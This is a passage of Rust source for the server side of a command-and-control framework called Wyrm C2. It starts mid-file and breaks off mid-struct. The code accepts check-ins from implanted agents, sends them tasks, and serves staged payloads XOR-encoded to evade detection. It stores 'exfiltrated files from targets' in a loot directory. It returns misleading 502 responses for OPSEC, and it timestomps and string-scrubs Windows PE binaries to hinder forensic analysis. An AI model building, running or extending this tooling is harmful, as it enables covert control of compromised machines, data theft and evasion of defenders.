                std::io::ErrorKind::AlreadyExists => (),
                _ => panic!("Could not create dir for {}", $dir_path),
            }
        }
    }};
}

/// Print a success message to stdout with a `[+]` prefix.
pub fn print_success(msg: impl Display) {
    println!("[+] {msg}");
}

/// Print an informational message to stdout with an `[i]` prefix.
pub fn print_info(msg: impl Display) {
    println!("[i] {msg}");
}

/// Print a failure message to stdout with a `[-]` prefix.
pub fn print_failed(msg: impl Display) {
    println!("[-] {msg}");
}


================================================
FILE: c2/src/main.rs
================================================
#![feature(map_try_insert)]

use core::panic;
use std::{any::Any, net::SocketAddr, sync::Arc, time::Duration};

use axum::{
    Router,
    body::Bytes,
    extract::DefaultBodyLimit,
    http::{Response, StatusCode, header},
    middleware::from_fn_with_state,
    routing::{get, post},
    serve,
};

use http_body_util::Full;
use shared::net::{
    ADMIN_ENDPOINT, ADMIN_HEALTH_CHECK_ENDPOINT, ADMIN_LOGIN_ENDPOINT,
    NOTIFICATION_CHECK_AGENT_ENDPOINT,
};
use tower_http::catch_panic::CatchPanicLayer;

use crate::{
    api::{
        admin_routes::{
            admin_login, admin_upload, build_all_binaries_handler, handle_admin_commands_on_agent,
            handle_admin_commands_without_agent, is_adm_logged_in, logout,
            poll_agent_notifications,
        },
        agent_get::{handle_agent_get, handle_agent_get_with_path},
        agent_post::{agent_post_handler, agent_post_handler_with_path},
    },
    app_state::{AppState, detect_stale_agents},
    db::Db,
    logging::{log_error, print_info, print_success},
    middleware::{authenticate_admin, authenticate_agent_by_header_token, logout_middleware},
    profiles::parse_profile,
};

mod admin_task_dispatch;
mod agents;
mod api;
mod app_state;
mod db;
mod exfil;
mod logging;
mod middleware;
mod net;
mod pe_utils;
mod profiles;

/// The maximum POST body request size that can be received by the C2.
/// `NUM_GIGS` GiB - currently 100 GiB. NOTE(review): an earlier comment said
/// "1 GB", but the constant below is 100; confirm which limit is intended.
const NUM_GIGS: usize = 100;
const MAX_POST_BODY_SZ: usize = NUM_GIGS * 1024 * 1024 * 1024;

/// Name of the admin session cookie.
const AUTH_COOKIE_NAME: &str = "session";
/// Lifetime of an admin session cookie.
const COOKIE_TTL: Duration = Duration::from_hours(12);

/// The path to the directory on the server (relative to the working directory of the service [n.b. this
/// implies the server was 'installed' correctly..])
const FILE_STORE_PATH: &str = "/data/staged_files";
/// Where exfiltrated files from targets are written.
const EXFIL_PATH: &str = "/data/loot";
/// Root directory for all server log files below.
const LOG_PATH: &str = "/data/logs";
/// Where database exports are written.
const DB_EXPORT_PATH: &str = "/data/exports";
const ACCESS_LOG: &str = "access.log";
const DOWNLOAD: &str = "downloads.log";
const LOGIN_LOG: &str = "login.log";
const ERROR_LOG: &str = "error.log";
const TOOLS_PATH: &str = "/tools";
const WOFS_PATH: &str = "/wofs_static";

/// C2 entry point: initialise shared state, build the router, and serve until
/// the listener shuts down.
#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
    //
    // Initialise the state of the C2, including checking the filesystem, database, etc.
    //
    let state = init_server_state().await;

    //
    // Build the router and serve content
    //
    // `CatchPanicLayer` turns handler panics into logged 500 responses (`handle_panic`).
    let app = build_routes(state.clone()).layer(CatchPanicLayer::custom(handle_panic));
    let listener = tokio::net::TcpListener::bind(construct_listener_addr()).await?;

    print_success(format!(
        "Wyrm C2 started on: {}",
        listener.local_addr().unwrap()
    ));

    // `into_make_service_with_connect_info` makes the peer SocketAddr available
    // to middleware (used for access logging).
    serve(
        listener,
        app.into_make_service_with_connect_info::<SocketAddr>(),
    )
    .await?;

    print_info("Server closed.");

    Ok(())
}

/// Build the `host:port` listen address from the `C2_HOST` and `C2_PORT`
/// environment variables.
///
/// # Panics
/// Panics when either variable is missing, or when `C2_PORT` does not parse as
/// a `u16`.
fn construct_listener_addr() -> String {
    let port: u16 = std::env::var("C2_PORT")
        .expect("could not find C2_PORT environment variable")
        .parse()
        .expect("could not parse port number to valid range");

    let host = std::env::var("C2_HOST").expect("could not find C2_HOST environment variable");

    format!("{host}:{port}")
}

/// Build the shared [`AppState`]: parse profiles, ensure the on-disk layout
/// exists, connect the database, then start the background automations
/// (session tracking and stale-agent detection).
///
/// # Panics
/// Panics if the profile files cannot be parsed - the server cannot run
/// without a valid profile.
async fn init_server_state() -> Arc<AppState> {
    print_info("Starting Wyrm C2.");

    let profile = match parse_profile().await {
        Ok(p) => p,
        Err(e) => {
            panic!("Could not parse profiles. {e}");
        }
    };

    print_success("Profiles parsed.");

    ensure_dirs_and_files();

    let pool = Db::new().await;
    let state = Arc::new(AppState::from(pool, profile).await);

    //
    // Kick off automations that run on the server
    //
    state.track_sessions();
    let state_cl = state.clone();
    tokio::task::spawn(async move { detect_stale_agents(state_cl).await });

    state
}

/// Assemble the full axum router: agent-facing public routes, then the admin
/// surface, all sharing `state`.
///
/// Public routes are gated by `authenticate_agent_by_header_token`; admin
/// routes (except login) by `authenticate_admin`.
fn build_routes(state: Arc<AppState>) -> Router {
    Router::new()
        //
        //
        // PUBLIC ROUTES
        //
        //
        .route(
            "/",
            get(handle_agent_get).layer(from_fn_with_state(
                state.clone(),
                authenticate_agent_by_header_token,
            )),
        )
        .route(
            "/",
            post(agent_post_handler).layer(from_fn_with_state(
                state.clone(),
                authenticate_agent_by_header_token,
            )),
        )
        // Used for the operator staging payloads or check-ins not to /
        .route(
            "/{*endpoint}",
            get(handle_agent_get_with_path).layer(from_fn_with_state(
                state.clone(),
                authenticate_agent_by_header_token,
            )),
        )
        .route(
            "/{*endpoint}",
            post(agent_post_handler_with_path).layer(from_fn_with_state(
                state.clone(),
                authenticate_agent_by_header_token,
            )),
        )
        //
        //
        // ADMIN ROUTES
        //
        //
        .route(
            "/logout_admin",
            post(logout).layer(from_fn_with_state(state.clone(), logout_middleware)),
        )
        // Uploading a file via the GUI
        .route(
            "/admin_upload",
            post(admin_upload).layer(from_fn_with_state(state.clone(), authenticate_admin)),
        )
        // Build all binaries path
        .route(
            "/admin_bab",
            post(build_all_binaries_handler)
                .layer(from_fn_with_state(state.clone(), authenticate_admin)),
        )
        // Login is deliberately unauthenticated - it establishes the session.
        .route(&format!("/{ADMIN_LOGIN_ENDPOINT}"), post(admin_login))
        // Admin endpoint when operating a command which is not related to a specific agent
        .route(
            &format!("/{ADMIN_ENDPOINT}"),
            post(handle_admin_commands_without_agent)
                .layer(from_fn_with_state(state.clone(), authenticate_admin)),
        )
        // Against a specific agent
        .route(
            &format!("/{ADMIN_ENDPOINT}/{}", "{id}"),
            post(handle_admin_commands_on_agent)
                .layer(from_fn_with_state(state.clone(), authenticate_admin)),
        )
        // For checking if notifications exist for a given agent
        .route(
            &format!("/{NOTIFICATION_CHECK_AGENT_ENDPOINT}/{}", "{id}"),
            get(poll_agent_notifications)
                .layer(from_fn_with_state(state.clone(), authenticate_admin)),
        )
        // A route for admin poll to check if logged in on the GUI
        .route(
            ADMIN_HEALTH_CHECK_ENDPOINT,
            get(is_adm_logged_in).layer(from_fn_with_state(state.clone(), authenticate_admin)),
        )
        //
        // Cap POST bodies at MAX_POST_BODY_SZ (see the constant - currently 100 GiB).
        //
        .layer(DefaultBodyLimit::max(MAX_POST_BODY_SZ))
        .with_state(state.clone())
}

/// Create every directory and log file the server expects on disk.
/// Panics (via the macros) on any error other than "already exists".
fn ensure_dirs_and_files() {
    create_dir!(FILE_STORE_PATH);
    create_dir!(DB_EXPORT_PATH);
    create_dir!(EXFIL_PATH);
    create_dir!(LOG_PATH);

    ensure_log_file_on_disk!(ACCESS_LOG);
    ensure_log_file_on_disk!(DOWNLOAD);
    ensure_log_file_on_disk!(LOGIN_LOG);
    ensure_log_file_on_disk!(ERROR_LOG);

    print_success("Directories and files are in order..");
}

/// Convert a caught handler panic into a JSON 500 response, recording the
/// panic message in the error log.
fn handle_panic(err: Box<dyn Any + Send + 'static>) -> Response<Full<Bytes>> {
    // Panic payloads are usually String or &str; anything else gets a placeholder.
    let details = err
        .downcast_ref::<String>()
        .cloned()
        .or_else(|| err.downcast_ref::<&str>().map(|s| s.to_string()))
        .unwrap_or_else(|| "Unknown panic message".to_string());

    log_error(&format!("PANIC: `{}`", details));

    // An empty JSON string body - nothing leaks to the client.
    let body = serde_json::to_string(&serde_json::json!("")).unwrap();

    Response::builder()
        .status(StatusCode::INTERNAL_SERVER_ERROR)
        .header(header::CONTENT_TYPE, "application/json")
        .body(Full::from(body))
        .unwrap()
}


================================================
FILE: c2/src/middleware.rs
================================================
use std::{net::SocketAddr, sync::Arc, time::Instant};

use axum::{
    extract::{ConnectInfo, Request, State},
    http::{HeaderMap, StatusCode},
    middleware::Next,
    response::IntoResponse,
};
use axum_extra::extract::CookieJar;
use base64::{Engine, engine::general_purpose};
use crypto::bcrypt::bcrypt;
use rand::{RngCore, rng};

use crate::{
    AUTH_COOKIE_NAME,
    app_state::AppState,
    logging::{log_download_accessed, log_error_async, log_page_accessed_no_auth},
};

/// Length in bytes of the bcrypt output hash stored/compared for operators.
const BCRYPT_HASH_BYTES: usize = 24;
/// bcrypt cost (work factor) parameter.
const BCRYPT_COST: u32 = 12;
/// Length in bytes of the random per-operator salt.
const SALT_BYTES: usize = 16;
/// Threshold (ms) above which a slow read-lock acquisition is logged.
const LOCK_WAIT_WARN_MS: u128 = 500;

/// Authenticates access to an admin route via the session cookie
/// (`AUTH_COOKIE_NAME`) presented with the request.
///
/// The cookie value must match a currently-active session key held in the
/// shared state; otherwise a 404 is returned (both for a missing cookie and an
/// unknown session, so probes cannot distinguish the two).
pub async fn authenticate_admin(
    jar: CookieJar,
    State(state): State<Arc<AppState>>,
    addr: ConnectInfo<SocketAddr>,
    request: Request,
    next: Next,
) -> impl IntoResponse {
    let session_key = match jar.get(AUTH_COOKIE_NAME) {
        Some(cookie) => cookie.to_string(),
        None => return StatusCode::NOT_FOUND.into_response(),
    };

    //
    // Determine whether the presented session key is present in the active keys
    //
    if state.has_session(&session_key).await {
        next.run(request).await.into_response()
    } else {
        StatusCode::NOT_FOUND.into_response()
    }
}

/// Verify the password passed into the admin route by comparing its calculated hash with the
/// expected hash from the db.
///
/// The final comparison is constant-time so that response timing cannot be
/// used to recover the stored hash byte-by-byte.
///
/// # Panics
/// Panics if the stored salt/hash are not valid base64, or if the bcrypt
/// blocking task panics (both indicate corrupt server state; the panic is
/// caught by the server's `CatchPanicLayer`).
pub async fn verify_password(password: &str, password_hash: &str, salt: &str) -> bool {
    let salt = general_purpose::STANDARD
        .decode(salt)
        .expect("invalid base64");

    let expected_hash = general_purpose::STANDARD
        .decode(password_hash)
        .expect("invalid b64 on password");

    let password = password.to_string();

    // Validate with bcrypt on same salt; bcrypt is CPU-heavy, so run it off the
    // async executor.
    let computed_hash: Vec<u8> = tokio::task::spawn_blocking(move || {
        let mut h = [0u8; BCRYPT_HASH_BYTES];
        bcrypt(BCRYPT_COST, &salt, password.as_bytes(), &mut h);
        h.to_vec()
    })
    .await
    .expect("bcrypt task panicked");

    // Both values are bcrypt outputs so their lengths are public; comparing
    // lengths directly leaks nothing.
    if computed_hash.len() != expected_hash.len() {
        return false;
    }

    // Constant-time equality: fold XOR differences over the whole buffer
    // instead of the short-circuiting `==` on Vec<u8>.
    computed_hash
        .iter()
        .zip(expected_hash.iter())
        .fold(0u8, |acc, (a, b)| acc | (a ^ b))
        == 0
}

/// Create a new operator in the database, taking in a plaintext password and hashing it with BCrypt
/// and a random salt.
///
/// The hashed password will be stored in the database, **not** the plaintext version.
///
/// # Panics
/// Panics if the bcrypt blocking task fails or the database insert fails -
/// operator creation is a setup-time operation where failing loudly is desired.
pub async fn create_new_operator(username: &str, password: &str, state: Arc<AppState>) {
    // Fresh random salt per operator.
    let mut salt = [0u8; SALT_BYTES];
    rng().fill_bytes(&mut salt);

    let salt_clone = salt.to_vec();
    let password = password.to_string();

    // bcrypt is CPU-heavy, so run it off the async executor.
    let computed_hash = tokio::task::spawn_blocking(move || {
        let mut hash_output = [0u8; BCRYPT_HASH_BYTES];
        bcrypt(
            BCRYPT_COST,
            &salt_clone,
            password.as_bytes(),
            &mut hash_output,
        );

        hash_output.to_vec()
    })
    .await
    .expect("Could not compute hash in create_new_operator");

    // Both salt and hash are persisted base64-encoded.
    let salt_b64 = general_purpose::STANDARD.encode(salt);
    let hash_b64 = general_purpose::STANDARD.encode(&computed_hash);

    state
        .db_pool
        .add_operator(username, &hash_b64, &salt_b64)
        .await
        .unwrap();
}

/// Authenticates an agent based on a header: `Authorization`. The agent will carry a security token which
/// was set by the operator so that we can verify the inbound connection DOES in fact relate to an agent under
/// our control.
///
/// This will reduce the attack surface of API's close to the database, and reduce the likelihood of a DDOS due to
/// batting the request off before we actually deal with it past middleware.
///
/// If the checks fail, a BAD_GATEWAY status will be returned, which may be a little more OPSEC savvy in that it may
/// throw off analysis thinking the server is down, whereas a 404 may indicate the server is active.
pub async fn authenticate_agent_by_header_token(
    State(state): State<Arc<AppState>>,
    addr: ConnectInfo<SocketAddr>,
    headers: HeaderMap,
    request: Request,
    next: Next,
) -> impl IntoResponse {
    // NOTE(review): the client address is taken from X-Forwarded-For, which is
    // client-controlled unless a trusted proxy sets it - treat logged IPs as
    // advisory only.
    let ip = if let Some(h) = headers.get("X-Forwarded-For") {
        h.to_str().unwrap_or("Not Found")
    } else {
        "Not found"
    };

    //
    // First, we need to check whether the request is going to a URI in which a download is staged
    // as we do not want to gate keep that as requiring the Auth header.
    //

    // Strip the leading '/' so the URI matches the stored endpoint keys.
    let uri = request.uri().to_string();
    let uri = &uri[1..];
    // Lock hold time is scoped tightly and measured; slow acquisitions are logged.
    let endpoints_lock_start = Instant::now();
    let is_download = {
        let lock = state.endpoints.read().await;
        lock.download_endpoints.contains_key(uri)
    };
    let endpoints_lock_wait_ms = endpoints_lock_start.elapsed().as_millis();
    if endpoints_lock_wait_ms > LOCK_WAIT_WARN_MS {
        log_error_async(&format!(
            "Slow endpoints read lock: {endpoints_lock_wait_ms}ms for uri {uri} from {ip}"
        ))
        .await;
    }

    if is_download {
        log_download_accessed(uri, ip).await;
        return next.run(request).await.into_response();
    }

    //
    // That URI wasn't requested, therefore we want to apply our auth check.
    //

    let h = match request.headers().get("authorization") {
        Some(h) => h,
        None => {
            log_page_accessed_no_auth(uri, ip).await;
            return StatusCode::BAD_GATEWAY.into_response();
        }
    };

    let auth_header = match h.to_str() {
        Ok(head) => head,
        Err(_) => {
            log_page_accessed_no_auth(uri, ip).await;
            return StatusCode::BAD_GATEWAY.into_response();
        }
    };

    let tokens_lock_start = Instant::now();
    let has_token = {
        let lock = state.agent_tokens.read().await;
        lock.contains(auth_header)
    };

    let tokens_lock_wait_ms = tokens_lock_start.elapsed().as_millis();
    if tokens_lock_wait_ms > LOCK_WAIT_WARN_MS {
        log_error_async(&format!(
            "Slow agent_tokens read lock: {tokens_lock_wait_ms}ms for uri {uri} from {ip}"
        ))
        .await;
    }

    if has_token {
        // The happy path, token present
        // log_page_accessed_auth(uri, ip).await;
        return next.run(request).await.into_response();
    }

    // The unhappy path
    log_page_accessed_no_auth(uri, ip).await;
    StatusCode::BAD_GATEWAY.into_response()
}

/// Middleware for the logout route: revoke the presented session cookie before
/// the handler runs. Requests without a session cookie receive a 404.
pub async fn logout_middleware(
    jar: CookieJar,
    State(state): State<Arc<AppState>>,
    request: Request,
    next: Next,
) -> impl IntoResponse {
    match jar.get(AUTH_COOKIE_NAME) {
        Some(session) => {
            let key = session.to_string();
            state.remove_session(&key).await;
            next.run(request).await.into_response()
        }
        None => StatusCode::NOT_FOUND.into_response(),
    }
}


================================================
FILE: c2/src/net.rs
================================================
//! Module relating to functionality over the wire, such as transformation of data in transit

use axum::{
    body::Body,
    http::{
        HeaderValue, StatusCode,
        header::{CONTENT_DISPOSITION, CONTENT_TYPE},
    },
    response::{IntoResponse, Response},
};
use futures::StreamExt;
use shared::{
    net::{TasksNetworkStream, XorEncode, encode_u16buf_to_u8buf},
    tasks::{Command, Task},
};
use std::path::PathBuf;
use tokio_util::io::ReaderStream;

use crate::{FILE_STORE_PATH, logging::log_error_async};

/// Serialises pending tasks to be sent over the wire to be consumed by the agent.
///
/// # Returns
/// If the input is `None`, a single Sleep command is serialised in the agent's
/// wire format. Otherwise every task is encoded, XOR'ed, and the whole set is
/// returned as a serde-json byte vector.
pub async fn serialise_tasks_for_agent(tasks: Option<Vec<Task>>) -> Vec<u8> {
    let mut responses: TasksNetworkStream = Vec::new();

    match tasks {
        Some(tasks) => {
            for task in tasks {
                responses.push(prepare_response_packet(task).await.xor_network_stream());
            }
        }
        None => {
            // No queued work: tell the agent to sleep.
            let sleep = Task {
                id: 0,
                command: Command::Sleep,
                metadata: None,
                completed_time: 0,
            };
            responses.push(prepare_response_packet(sleep).await.xor_network_stream());
        }
    }

    serde_json::to_vec(&responses).unwrap()
}

/// Encode a single task into the agent's u16-based wire packet:
/// [task id (2 words)] [command (2 words)] [zeroed completed-time (4 words)]
/// [optional metadata as UTF-16 code units], then flatten to bytes.
async fn prepare_response_packet(task: Task) -> Vec<u8> {
    let mut packet = from_task_id_bytes(task.id);

    let (low, high) = task.command.to_u16_tuple_le();
    packet.extend_from_slice(&[low, high]);

    // Reserve an i64's worth of zeroed space for the completed time - the
    // packet is u16-based, so 8 bytes == four words.
    packet.extend_from_slice(&[0u16; 4]);

    // Append metadata (when present) encoded as UTF-16 code units.
    if let Some(data) = task.metadata {
        packet.extend(data.encode_utf16());
    }

    encode_u16buf_to_u8buf(&packet)
}

/// Split a task id into two little-endian u16 words: low word first, then high.
fn from_task_id_bytes(id: i32) -> Vec<u16> {
    let raw = id as u32;
    vec![(raw & 0xFFFF) as u16, (raw >> 16) as u16]
}

/// Serves a file from the local disk by its file name. The server will look in the
/// ../staged_files/ dir for the relevant file.
///
/// When `xor_key` is supplied the file was staged XOR-encoded, so each streamed
/// chunk is XOR'ed with the key on the fly. On an open failure a BAD_GATEWAY is
/// returned and the error logged.
pub async fn serve_file(filename: &String, xor_key: Option<u8>) -> Response {
    let mut path = PathBuf::from(FILE_STORE_PATH);
    path.push(filename);

    let file = match tokio::fs::File::open(path).await {
        Ok(f) => f,
        Err(e) => {
            log_error_async(&format!("Failed to read file. {e}")).await;
            return StatusCode::BAD_GATEWAY.into_response();
        }
    };

    let stream = ReaderStream::new(file);

    let body = match xor_key {
        // Serve XOR'ed bytes if the file was staged as XOR payload
        Some(key) => Body::from_stream(stream.map(move |chunk| {
            chunk.map(|bytes| {
                let encoded: Vec<u8> = bytes.iter().map(|b| b ^ key).collect();
                axum::body::Bytes::from(encoded)
            })
        })),
        None => Body::from_stream(stream),
    };

    Response::builder()
        .status(StatusCode::OK)
        .header(
            CONTENT_TYPE,
            HeaderValue::from_static("application/octet-stream"),
        )
        .header(
            CONTENT_DISPOSITION,
            HeaderValue::from_static("inline; filename=\"(unknown)\""),
        )
        .body(body)
        .unwrap()
}


================================================
FILE: c2/src/pe_utils/mod.rs
================================================
use std::{io::SeekFrom, path::Path};

use chrono::NaiveDateTime;
use thiserror::Error;
use tokio::{
    fs::{File, OpenOptions},
    io::{AsyncReadExt, AsyncSeekExt, AsyncWriteExt},
};

use crate::{
    logging::log_error_async,
    pe_utils::types::{IMAGE_DOS_HEADER, IMAGE_NT_HEADERS64},
};

mod types;

/// Errors raised while reading or rewriting PE headers (see
/// `timestomp_binary_compile_date` and the other scrubbing helpers).
#[derive(Error, Debug)]
pub enum PeScrubError {
    #[error("unable to open file, {0}")]
    FileOpen(String),
    #[error("unable to read buffer from file object, {0}")]
    FileRead(String),
    #[error("did not match on magic bytes, got: {0}")]
    MagicBytesMZ(u16),
    #[error("could not read file content, but not a file read error..")]
    NoRead,
    #[error("datetime was not formatted correctly, must be british formatting - %d/%m/%Y %H:%M:%S")]
    DTMismatch,
    #[error("Circuit breaker hit in loop")]
    CircuitBreaker,
    #[error("the buffer was too small")]
    BuffTooSmall,
    #[error("could not write to file, {0}")]
    FileWriteError(String),
}

/// Timestomps the compiled time of a given PE.
///
/// # Args
/// - `dt_str`: The datetime in British format for the binary to have in its compiled time headers.
/// - `build_path`: The path to the file to timestomp on disk.
///
/// # Returns
/// The function only returns meaningful data on error, being [`PeScrubError`]. On success nothing is returned,
/// the original file is modified in place.
pub async fn timestomp_binary_compile_date(
    dt_str: &str,
    build_path: &Path,
) -> Result<(), PeScrubError> {
    let mut file = OpenOptions::new()
        .read(true)
        .write(true)
        .open(build_path)
        .await
        .map_err(|e| PeScrubError::FileOpen(e.to_string()))?;

    //
    // Read the first 2 kb of the binary into our buffer and grab the e_lfanew so we can offset to the
    // TimeDateStamp field
    //
    const INITIAL_LEN: usize = 2000;
    // Zero-initialised rather than `with_capacity` + `set_len`: handing
    // uninitialised memory to `read_exact` is undefined behaviour, and the
    // zeroing cost here is negligible.
    let mut buf = vec![0u8; INITIAL_LEN];

    if let Err(e) = file.read_exact(&mut buf).await {
        return Err(PeScrubError::FileRead(e.to_string()));
    }

    // SAFETY: the buffer (2000 bytes) is comfortably larger than the DOS
    // header. `read_unaligned` is used because a `Vec<u8>` allocation gives no
    // alignment guarantee for IMAGE_DOS_HEADER, so a plain reference deref
    // would be unsound.
    let dos_header: IMAGE_DOS_HEADER =
        unsafe { std::ptr::read_unaligned(buf.as_ptr() as *const IMAGE_DOS_HEADER) };

    if dos_header.e_magic != 0x5a4d {
        return Err(PeScrubError::MagicBytesMZ(dos_header.e_magic));
    }

    // check that we have the NT header in the buffer, if not, then just read the whole file,
    // but this should not happen
    if dos_header.e_lfanew as usize + size_of::<IMAGE_NT_HEADERS64>() > buf.len() {
        return Err(PeScrubError::BuffTooSmall);
    }

    //
    // Create the datetime as epoch then write to the original file at the correct offset (e_lfanew + 8 bytes)
    //
    let timestamp = str_to_epoch(dt_str)?;

    const OFFSET_TIMESTAMP: u64 = 8;
    file.seek(SeekFrom::Start(
        dos_header.e_lfanew as u64 + OFFSET_TIMESTAMP,
    ))
    .await
    .map_err(|e| PeScrubError::FileWriteError(e.to_string()))?;

    file.write_all(&timestamp.to_le_bytes())
        .await
        .map_err(|e| PeScrubError::FileWriteError(e.to_string()))?;

    file.flush()
        .await
        .map_err(|e| PeScrubError::FileWriteError(e.to_string()))?;

    Ok(())
}

/// Parses a British-formatted (`%d/%m/%Y %H:%M:%S`) datetime string into a Unix epoch
/// timestamp, truncated to the `u32` width of the PE `TimeDateStamp` field.
///
/// Returns [`PeScrubError::DTMismatch`] if the string does not match the expected format.
fn str_to_epoch(dt_str: &str) -> Result<u32, PeScrubError> {
    NaiveDateTime::parse_from_str(dt_str, "%d/%m/%Y %H:%M:%S")
        .map_err(|_| PeScrubError::DTMismatch)
        .map(|parsed| parsed.and_utc().timestamp() as u32)
}

/// Scrubs all occurrences of `needle` from the file at `build_path`, overwriting it in place.
///
/// If `replacement` is:
/// - `None`: the bytes are zeroed out.
/// - `Some(r)`: the bytes are zeroed and then the first `r.len()` bytes are replaced with `r`.
///
/// An empty `needle`, or a `replacement` longer than `needle` (which cannot fit in place),
/// results in no scrubbing being performed (the latter is logged).
///
/// # Error
/// Function returns a [`PeScrubError`] if an error occurs. [`PeScrubError::CircuitBreaker`] is
/// returned if the occurrence cap is hit; changes made up to that point are still committed.
pub async fn scrub_strings(
    build_path: &Path,
    needle: &[u8],
    replacement: Option<&[u8]>,
) -> Result<(), PeScrubError> {
    // An empty needle is meaningless to scrub, and `windows(0)` below would panic.
    if needle.is_empty() {
        return Ok(());
    }

    // Validate the replacement once up front. The previous version logged and `continue`d
    // inside the scan loop without advancing past the match, which looped forever.
    if let Some(replacement) = replacement {
        if replacement.len() > needle.len() {
            let s = String::from_utf8_lossy(needle);
            log_error_async(&format!(
                "Could not scrub string {s}, replacement was longer than input."
            ))
            .await;

            return Ok(());
        }
    }

    let mut file = OpenOptions::new()
        .read(true)
        .write(true)
        .open(build_path)
        .await
        .map_err(|e| PeScrubError::FileOpen(e.to_string()))?;

    // Propagate metadata failures instead of unwrapping (previously panicked on error).
    let file_len = file
        .metadata()
        .await
        .map_err(|e| PeScrubError::FileRead(e.to_string()))?
        .len() as usize;

    // Zero-initialise the buffer; `set_len` over uninitialised capacity is undefined behaviour.
    let mut buf = vec![0u8; file_len];

    if let Err(e) = file.read_exact(&mut buf).await {
        return Err(PeScrubError::FileRead(e.to_string()));
    }

    const CIRCUIT_BREAKER_MAX: u32 = 10000;
    let mut hits: u32 = 0;

    // Resume each search after the previous match instead of rescanning from the start of the
    // buffer. This guarantees forward progress (no infinite loop even if the replacement
    // contains the needle) and makes the pass O(n) overall rather than O(n * matches).
    let mut cursor = 0;
    while let Some(rel) = buf[cursor..].windows(needle.len()).position(|w| w == needle) {
        let pos = cursor + rel;
        let end = pos + needle.len();

        buf[pos..end].fill(0);
        if let Some(replacement) = replacement {
            buf[pos..pos + replacement.len()].copy_from_slice(replacement);
        }

        cursor = end;

        hits += 1;
        if hits >= CIRCUIT_BREAKER_MAX {
            //
            // We hit the circuit breaker for the loop - write what changes were made to the
            // binary, and return an error, discontinuing the loop.
            //
            commit_files(&mut file, &mut buf).await?;
            return Err(PeScrubError::CircuitBreaker);
        }
    }

    commit_files(&mut file, &mut buf).await
}

async fn commit_files(file: &mut File, buf: &mut Vec<u8>) -> Result<(), PeScrubError> {
    file.seek(SeekFrom::Start(0))
        .await
        .map_err(|e| PeScrubError::FileWriteError(e.to_string()))?;

    file.write_all(&buf)
        .await
        .map_err(|e| PeScrubError::FileWriteError(e.to_string()))?;

    file.flush()
        .await
        .map_err(|e| PeScrubError::FileWriteError(e.to_string()))?;

    Ok(())
}


================================================
FILE: c2/src/pe_utils/types.rs
================================================
/// COFF file header (`IMAGE_FILE_HEADER`) of a PE image, laid out `#[repr(C)]` to match the
/// on-disk format. `TimeDateStamp` sits 4 bytes into this struct — i.e. 8 bytes past the start
/// of [`IMAGE_NT_HEADERS64`], after the 4-byte `Signature`.
#[repr(C)]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_FILE_HEADER {
    pub Machine: IMAGE_FILE_MACHINE,
    pub NumberOfSections: u16,
    // Build timestamp (seconds since Unix epoch) — the field timestomping targets.
    pub TimeDateStamp: u32,
    pub PointerToSymbolTable: u32,
    pub NumberOfSymbols: u32,
    pub SizeOfOptionalHeader: u16,
    pub Characteristics: IMAGE_FILE_CHARACTERISTICS,
}

/// Newtype over the raw `u16` `Machine` value of [`IMAGE_FILE_HEADER`];
/// `#[repr(transparent)]` keeps it layout-identical to `u16`.
#[repr(transparent)]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_FILE_MACHINE(pub u16);

/// Newtype over the raw `u16` `Characteristics` flags of [`IMAGE_FILE_HEADER`];
/// `#[repr(transparent)]` keeps it layout-identical to `u16`.
#[repr(transparent)]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_FILE_CHARACTERISTICS(pub u16);

/// 64-bit NT headers (`IMAGE_NT_HEADERS64`) of a PE image, located at the offset given by
/// [`IMAGE_DOS_HEADER::e_lfanew`]. Laid out `#[repr(C)]` to match the on-disk format.
#[repr(C)]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_NT_HEADERS64 {
    // Expected to be the 4-byte "PE\0\0" signature.
    pub Signature: u32,
    pub FileHeader: IMAGE_FILE_HEADER,
    pub OptionalHeader: IMAGE_OPTIONAL_HEADER64,
}

/// Legacy DOS header (`IMAGE_DOS_HEADER`) at the very start of every PE file.
/// `packed(2)` matches the Windows SDK's 2-byte packing for this struct.
///
/// The two fields this crate actually reads are `e_magic` (expected `0x5a4d`, ASCII "MZ")
/// and `e_lfanew` (file offset of the NT headers, at struct offset 0x3C).
#[repr(C, packed(2))]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_DOS_HEADER {
    // "MZ" magic, 0x5a4d when valid.
    pub e_magic: u16,
    pub e_cblp: u16,
    pub e_cp: u16,
    pub e_crlc: u16,
    pub e_cparhdr: u16,
    pub e_minalloc: u16,
    pub e_maxalloc: u16,
    pub e_ss: u16,
    pub e_sp: u16,
    pub e_csum: u16,
    pub e_ip: u16,
    pub e_cs: u16,
    pub e_lfarlc: u16,
    pub e_ovno: u16,
    pub e_res: [u16; 4],
    pub e_oemid: u16,
    pub e_oeminfo: u16,
    pub e_res2: [u16; 10],
    // File offset of IMAGE_NT_HEADERS; signed per the Windows SDK definition.
    pub e_lfanew: i32,
}

/// 64-bit optional header (`IMAGE_OPTIONAL_HEADER64`) embedded in [`IMAGE_NT_HEADERS64`].
/// `packed(4)` matches the Windows SDK's 4-byte packing for the 64-bit variant.
#[repr(C, packed(4))]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_OPTIONAL_HEADER64 {
    pub Magic: IMAGE_OPTIONAL_HEADER_MAGIC,
    pub MajorLinkerVersion: u8,
    pub MinorLinkerVersion: u8,
    pub SizeOfCode: u32,
    pub SizeOfInitializedData: u32,
    pub SizeOfUninitializedData: u32,
    pub AddressOfEntryPoint: u32,
    pub BaseOfCode: u32,
    pub ImageBase: u64,
    pub SectionAlignment: u32,
    pub FileAlignment: u32,
    pub MajorOperatingSystemVersion: u16,
    pub MinorOperatingSystemVersion: u16,
    pub MajorImageVersion: u16,
    pub MinorImageVersion: u16,
    pub MajorSubsystemVersion: u16,
    pub MinorSubsystemVersion: u16,
    pub Win32VersionValue: u32,
    pub SizeOfImage: u32,
    pub SizeOfHeaders: u32,
    pub CheckSum: u32,
    pub Subsystem: IMAGE_SUBSYSTEM,
    pub DllCharacteristics: IMAGE_DLL_CHARACTERISTICS,
    pub SizeOfStackReserve: u64,
    pub SizeOfStackCommit: u64,
    pub SizeOfHeapReserve: u64,
    pub SizeOfHeapCommit: u64,
    pub LoaderFlags: u32,
    pub NumberOfRvaAndSizes: u32,
    // Fixed 16-entry data directory table, per the PE format.
